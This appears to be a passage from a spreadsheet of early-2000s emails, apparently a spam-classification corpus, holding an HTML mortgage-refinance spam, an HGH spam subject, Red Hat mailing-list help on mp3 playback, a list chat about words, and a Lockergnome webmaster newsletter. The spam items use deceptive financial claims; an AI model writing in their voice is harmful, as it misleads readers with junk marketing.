         &lt;TR style=3D"mso-yfti-irow: 0"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 PADDING-TOP: 0in" 
           colSpan=3D2&gt;
             &lt;P class=3DMsoNormal&gt;&lt;FONT face=3D"Times New Roman" color=3Dblack 
             size=3D3&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 12pt; COLOR: =
 black"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR style=3D"mso-yfti-irow: 1"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 PADDING-TOP: 0in"&gt;
             &lt;P class=3DMsoNormal&gt;&lt;FONT face=3D"Times New Roman" color=3Dblack 
             size=3D3&gt;&lt;SPAN style=3D"FONT-SIZE: 12pt; COLOR: black"&gt;&lt;A 
             href=3D"http://www.thezs.com/0066/index.html"&gt;&lt;SPAN 
             style=3D"TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG 
             id=3D_x0000_i1031 height=3D52 hspace=3D5 
             src=3D"http://www.thezs.com/0066/click.gif" width=3D112 
             border=3D0&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 PADDING-TOP: 0in"&gt;
             &lt;P class=3DMsoNormal&gt;&lt;FONT face=3D"Times New Roman" color=3Dblack 
             size=3D3&gt;&lt;SPAN style=3D"FONT-SIZE: 12pt; COLOR: black"&gt;&lt;A 
             href=3D"http://www.thezs.com/0066/index.html"&gt;&lt;SPAN 
             style=3D"TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG 
             id=3D_x0000_i1032 height=3D126 src=3D"http://www.thezs.com/0066/234.=
 jpg" 
             width=3D272 =
 border=3D0&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR style=3D"mso-yfti-irow: 2; mso-yfti-lastrow: yes"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 PADDING-TOP: 0in" 
           colSpan=3D2&gt;
             &lt;P class=3DMsoNormal&gt;&lt;FONT face=3D"Times New Roman" color=3Dblack 
             size=3D3&gt;&lt;SPAN style=3D"FONT-SIZE: 12pt; COLOR: black"&gt;&lt;IMG 
             id=3D_x0000_i1033 height=3D20 src=3D"file:///\\C|\edemo\quote123\shim.=
 gif" 
             width=3D1 
       border=3D0&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
       &lt;P class=3DMsoNormal align=3Dcenter&gt;&lt;FONT face=3D"Times New Roman" =
 size=3D3&gt;&lt;SPAN 
       style=3D"DISPLAY: none; FONT-SIZE: 12pt; mso-hide: =
 all"&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;TABLE class=3DMsoNormalTable 
       style=3D"WIDTH: 435pt; mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in =
 0in" 
       cellSpacing=3D0 cellPadding=3D0 width=3D580 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR style=3D"mso-yfti-irow: 0"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 PADDING-TOP: 0in"&gt;
             &lt;P class=3DMsoNormal style=3D"TEXT-ALIGN: center" =
 align=3Dcenter&gt;&lt;B&gt;&lt;FONT 
             face=3DVerdana color=3D#0f209f size=3D4&gt;&lt;SPAN 
             style=3D"FONT-WEIGHT: bold; FONT-SIZE: 13.5pt; COLOR: #0f209f; =
 FONT-FAMILY: Verdana"&gt;&lt;A 
             href=3D"http://www.thezs.com/0066/index.html"&gt;RATES ARE LOW - DON'T =
             MISS THIS =
 OPPORTUNITY&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR style=3D"mso-yfti-irow: 1"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 PADDING-TOP: 0in"&gt;
             &lt;UL type=3Ddisc&gt;
               &lt;LI class=3DMsoNormal 
               style=3D"mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; =
 mso-list: l0 level1 lfo3; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
               face=3DVerdana color=3Dblack size=3D2&gt;&lt;SPAN 
               style=3D"FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Good 
               or Bad Credit.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt; 
               &lt;LI class=3DMsoNormal 
               style=3D"mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; =
 mso-list: l0 level1 lfo3; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
               face=3DVerdana color=3Dblack size=3D2&gt;&lt;SPAN 
               style=3D"FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Ideal 
               Time to Purchase a Home.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt; 
               &lt;LI class=3DMsoNormal 
               style=3D"mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; =
 mso-list: l0 level1 lfo3; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
               face=3DVerdana color=3Dblack size=3D2&gt;&lt;SPAN 
               style=3D"FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Refinance 
               your Existing Mortgage - Lower your Current 
               Payments.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt; 
               &lt;LI class=3DMsoNormal 
               style=3D"mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; =
 mso-list: l0 level1 lfo3; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
               face=3DVerdana color=3Dblack size=3D2&gt;&lt;SPAN 
               style=3D"FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Convert 
               your Adjustable Rate Mortgage (ARM) to a low fixed 
               loan.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt; 
               &lt;LI class=3DMsoNormal 
               style=3D"mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; =
 mso-list: l0 level1 lfo3; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
               face=3DVerdana color=3Dblack size=3D2&gt;&lt;SPAN 
               style=3D"FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Convert 
               your ARM to a better ARM.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt; 
               &lt;LI class=3DMsoNormal 
               style=3D"mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; =
 mso-list: l0 level1 lfo3; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
               face=3DVerdana color=3Dblack size=3D2&gt;&lt;SPAN 
               style=3D"FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Convert 
               your 30 yr Mortgage to a 15 yr Mortgage - build equity 
               faster.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt; 
               &lt;LI class=3DMsoNormal 
               style=3D"mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; =
 mso-list: l0 level1 lfo3; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
               face=3DVerdana color=3Dblack size=3D2&gt;&lt;SPAN 
               style=3D"FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Need 
               Cash? Home equity loan rates are priced 
               right.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt; &lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR style=3D"mso-yfti-irow: 2; mso-yfti-lastrow: yes"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 PADDING-TOP: 0in"&gt;
             &lt;P class=3DMsoNormal style=3D"TEXT-ALIGN: center" =
 align=3Dcenter&gt;&lt;B&gt;&lt;FONT 
             face=3DVerdana color=3Dblack size=3D3&gt;&lt;SPAN 
             style=3D"FONT-WEIGHT: bold; FONT-SIZE: 12pt; COLOR: black; =
 FONT-FAMILY: Verdana"&gt;Save 
             Hundreds of Dollars Each Month - Rates are Great - Don't Miss =
 This 
             &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;ST1:PLACE&gt;&lt;B&gt;&lt;FONT face=3DVerdana =
 color=3Dblack&gt;&lt;SPAN 
             style=3D"FONT-WEIGHT: bold; COLOR: black; FONT-FAMILY: =
 Verdana"&gt;Opportunity&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/ST1:PLACE&gt;&lt;B&gt;&lt;FONT 
             face=3DVerdana color=3Dblack&gt;&lt;SPAN 
             style=3D"FONT-WEIGHT: bold; COLOR: black; FONT-FAMILY: Verdana"&gt;.=
 &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
       &lt;P class=3DMsoNormal align=3Dcenter&gt;&lt;FONT face=3D"Times New Roman" =
 size=3D3&gt;&lt;SPAN 
       style=3D"DISPLAY: none; FONT-SIZE: 12pt; mso-hide: =
 all"&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;TABLE class=3DMsoNormalTable 
       style=3D"WIDTH: 351pt; mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in =
 0in" 
       cellSpacing=3D0 cellPadding=3D0 width=3D468 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR style=3D"mso-yfti-irow: 0"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 WIDTH: 351pt; PADDING-TOP: 0in" 
           width=3D468&gt;
             &lt;P class=3DMsoNormal style=3D"TEXT-ALIGN: center" align=3Dcenter&gt;&lt;FONT 
             face=3D"Times New Roman" color=3Dblack size=3D3&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 12pt; COLOR: black"&gt;&lt;A 
             href=3D"http://www.thezs.com/0066/index.html"&gt;&lt;SPAN 
             style=3D"TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG 
             id=3D_x0000_i1034 height=3D60 
             src=3D"http://www.thezs.com/0066/getstarted.gif" width=3D200 
             border=3D0&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR style=3D"mso-yfti-irow: 1; mso-yfti-lastrow: yes"&gt;
           &lt;TD 
           style=3D"PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; =
 WIDTH: 351pt; PADDING-TOP: 0in" 
           width=3D468&gt;
             &lt;P class=3DMsoNormal style=3D"TEXT-ALIGN: center" align=3Dcenter&gt;&lt;FONT 
             face=3D"Times New Roman" color=3Dblack size=3D3&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 12pt; COLOR: black"&gt;&lt;A 
             href=3D"http://www.thezs.com/0066/index.html"&gt;&lt;SPAN 
             style=3D"TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG 
             id=3D_x0000_i1035 height=3D60 
             src=3D"http://www.thezs.com/0066/quotes_468x60_purple2.gif" =
 width=3D468 
             =
 border=3D0&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DI=
 V&gt;
       &lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;HR align=3Dleft width=3D"95%"&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_186_75347104803485215881--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy,Do You Know the HGH Differences ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
 &gt;Once upon a time, Roi wrote :
 &gt;
 &gt;  
 &gt;
 &gt;&gt;oh xmms didn't work for me also
 &gt;&gt;i used mpg123 i tought its something from me
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Nope, this is "normal" as Red Hat removed all mp3 support from 8.0 because
 &gt;of patent and royalty issues :-(
 &gt;On freshrpms.net, you can find the xmms mp3 plugin as I said, but also
 &gt;libmad, lame (mp3 encoder), and soon mpg321 as I often used it myself.
 &gt;Many other players can also play mp3 files, like alsaplayer, xine, mplayer.
 &gt;
 &gt;  
 &gt;
 &gt;&gt;like mplayer not working also and gives black screen
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;This is not normal though...
 &gt;Try "mplayer -vo help" then try usinf various output methods to see if some
 &gt;do work or not.
 &gt;
 &gt;Matthias
 &gt;
 &gt;  
 &gt;
 mplayer works with dga (if i am root) and works with x11
 and always worked with sdl (but not now with redhat 8)
 now it gives black screen window and play the music of the movie.
 Roi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[2]: Bukkake
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-08-09 at 08:20, bitbitch@magnesium.net wrote:
 &gt; Smegma, happens to be a personal favorite.   Years ago, to my five
 &gt; year old brain, my dad used to inform me that I had 'smegma' in my
 &gt; eye, and would proceed to extricate it.
 I don't think there is a specific word in English for eye goop. 
 However, when I was halfway literate in Tagalog, I learned that there is
 a specific word in that language (or was it another dialect?) for it:
 muta, pronounced "MOO-ta".  Even though my Tagalog has faded greatly, I
 automatically use that word for "eye goop" when speaking English (how
 often does that happen?), mostly because it apparently filled a
 linguistic hole in my brain and therefore permanently wedged itself into
 my vocabulary.
 Not that this is important, but I've inadvertently adopted "muta" into
 my version of the English language as the word for "eye goop".  Arguably
 better than "smegma" anyway.
 (Definitely Friday...)
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/webmaster/20020719.html"&gt;
       http://www.lockergnome.com/issues/webmaster/20020719.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgweb-2534373J@sprocket.lockergnome.com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#14367A }
  a:link    { COLOR: #008000; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #003E00; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: #000000; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #FF9700; BORDER-BOTTOM: #E08A00 4px solid; BORDER-LEFT: #FFB03F 4px solid; BORDER-RIGHT: #E08A00 4px solid; BORDER-TOP: #FFB03F 4px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #FF9700; TEXT-ALIGN: center; BORDER-BOTTOM: #E08A00 3px solid; BORDER-LEFT: #FFB03F 3px solid; BORDER-RIGHT: #E08A00 3px solid; BORDER-TOP: #FFB03F 3px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold } 
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;
 &lt;title&gt;20020719 Sausage Sizzler - Lockergnome - Webmaster Weekly&lt;/title&gt;&lt;/head&gt;
 &lt;body   MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"   style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#4C2E00" alink="#000000" link="#008000" vlink="#003E00"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/back.top-r1.gif"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&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- WebREPORT --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp;07.19.2002 WebREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font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This year's &lt;a href="http://www.sic.org"&gt;SIC&lt;/a&gt; gets the blame for the 
 lateness of this issue. Lori and I spent Wednesday thru Sunday meeting 
 software authors, participating in educational sessions, viewing product 
 demonstrations, and most of all having fun. This was Lori's second trip 
 to an SIC conference, so she got to reacquaint herself with many familiar 
 faces, while I was getting to put faces with many people I've exchanged 
 e-mails with over the last several years. As much as I enjoy information 
 exchange via computer, the human interaction of meeting people and 
 sharing ideas and stories face-to-face is priceless.
 &lt;p&gt;
 One cool discovery at this year's SIC, pertaining directly to Webmasters, 
 is Nick Bradbury's release of 
 &lt;a href="http://www.bradsoft.com/topstyle/index.asp"&gt;TopStyle 3.0&lt;/a&gt;. 
 Nick's the guy who created HomeSite, long before it joined the Macromedia 
 family of products. Version 3 represents a return to those HTML editing 
 roots, with the addition of editing capabilities now functioning 
 hand-in-hand with the rock solid style sheet building features that 
 previously defined  TopStyle. Conversion of existing font tags to CSS is 
 just one of several new additions. I should have a full review in one of 
 the next two issues.
 &lt;p&gt;
 Also in the coming soon category - a GnomeTome on Cold Fusion, written by 
 one of Iowa's resident ColdFusion experts (who also happens to be an 
 expert on an International level), Kevin Schmidt. Kevin wrote the 
 &lt;a href="http://www.amazon.com/exec/obidos/ASIN/0201758474/ref=ase_lockergnome""&gt;Training From the Source&lt;/a&gt; 
 book on Cold Fusion 5 and is currently writing a revision for 
 ColdFusionMX. The GnomeTome means we'll have a nice pairing of tips for 
 both static pages, in the form of 
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;Dreamweaver tips&lt;/a&gt;, and tips on dynamic 
 site development with Kevin's tips on ColdFusion.
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- MAIL --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeMAIL&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Email 911&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.email911.com"&gt;http://www.email911.com&lt;/a&gt;&lt;p&gt;
 E-mail remains the killer app of the Internet, despite all the incredible 
 artistic efforts by many Web designers. As we all know, e-mail is also a 
 source of great frustration and misuse - turning otherwise likeable folks 
 into enemies of your inbox defense system. Email 911 aims to educate the 
 ignorant, while aiding those of us with a reasonable understanding of 
 effective e-mail communication in ways to make e-mail even more useful. 
 The newsletters and discussions affiliated with this site should be 
 required reading for all corporate users, although home users would most 
 certainly benefit as well. For an exceptional look at eliminating junk 
 from your inbox, check out the e-book "What Can I Do About Spam?"
 &lt;br&gt;&lt;br&gt;
 &lt;!-- TOOLS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTOOLS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;ApacheConf v2.0 [1.1MB] W9X/NT/W2K/XP $19.95&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.zecos.com/apacheconf/index.html"&gt;http://www.zecos.com/apacheconf/index.html&lt;/a&gt;&lt;p&gt;
 Configure your Apache httpd.conf file in a visual environment instead 
 of a text editor. This tool provides a visual representation of all 
 configurable options available to Apache admins, offering great 
 learning capabilities for newer webmasters, as well as saving time for 
 experienced administrators who tire of scrolling through screen after 
 screen of configurations. A source view makes manual editing of the 
 file easier, by bolding and coloring various configuration directives, 
 similar to the way HTML editors mark code. Avoid typos with built-in 
 error checking, which provides warnings when invalid directives are 
 used.
 &lt;!-- SERVER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSERVER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Latest kbALertz for Webmaters&lt;/b&gt;&lt;p&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q324098"&gt;Q324098 - File Download Dialog Box Appears After You Turn Off File Downloads (Q324098)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q325216"&gt;Q325216 - WebCast: Administrating Internet Explorer in Windows 2000 (Q325216)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q265288"&gt;Q265288 - FP2000: Themes Dialog Box Flashes and Then Disappears (Q265288)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321156"&gt;Q321156 - FtpPutFile Returns Success Although the Operation Fails in Internet Explorer (Q321156)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q264951"&gt;Q264951 - FP2000: Error 2 When You Attempt to Open Registry Key in FrontPage (Q264951)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;!-- Middle Ad --&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;TURBO-CHARGE YOUR FTP EXPERIENCE:&lt;/b&gt; TurboFTP is a fully automated 
 FTP client to make your Internet file transfer fast and efficient. It 
 offers a straightforward dual-pane view that covers both a local folder 
 and a remote directory. TurboFTP offers strong interruption and stall 
 protection. It also allows you to drag and drop from Windows Explorer. 
 TuroboFTP also includes firewall compatibility and comes with a handy 
 Address Book for convenient organization of your FTP sites. 
 &lt;a href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=36767"&gt;Get Your FREE Trial Now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- USABILITY --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeUSABILITY&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Making A Commercial Case for Adopting Web Standards&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.maccaws.com/"&gt;http://www.maccaws.com/&lt;/a&gt;&lt;p&gt;
 Supporting standards and writing good code are often things that the number 
 crunchers in a business don't feel are as important, when compared against 
 getting the product to as many people as possible in the shortest amount of 
 time possible in an effort to generate revenue. Communicating the 
 importance of standards and good code can be an uphill battle; after all, 
 you're just a programmer, right? MACCAWS aims to make your job easier, via 
 an open discussion on the establishment of standards that will make sense 
 to the folks who control the bottom line. Their mission is to educate 
 business leaders by providing you the end user with tools that will help 
 make a case for applying standards to your Web efforts. If you've got a 
 voice you'd like to add to their cause, visit them on the Web and help 
   influence the course of Web standards development.
 &lt;!-- BLOG --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeBLOG&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;WAPBLOGGER&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.ubique.ch/wapblogger/"&gt;http://www.ubique.ch/wapblogger/&lt;/a&gt;&lt;p&gt;
 Post to your blog via a WAP enabled device with the assistance of this 
 interface, designed by "some Swiss guy called Niklaus. As long as your 
 blogging tool supports the Blogger API (most do), you'll have no problem 
 updating your online thoughts, no matter where in the world you may be. 
 Use a WAP browser from your Palm, Pocket PC, or even a cell phone. The 
 service is currently free, hosted by Niklaus at his personal site. The 
 site FAQ offers great suggestions for adding posts while keeping 
 connection charges to a minimum. 
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/webmasterweekly/20020719.html"&gt;http://www.lockergnome.com/issues/webmasterweekly/20020719.html&lt;/a&gt;&lt;br&gt;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HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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href="mailto:jake@lockergnome.com?subject=Webmaster Weekly"&gt;E-mail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 bgcolor="#B6EB8F"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;CREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
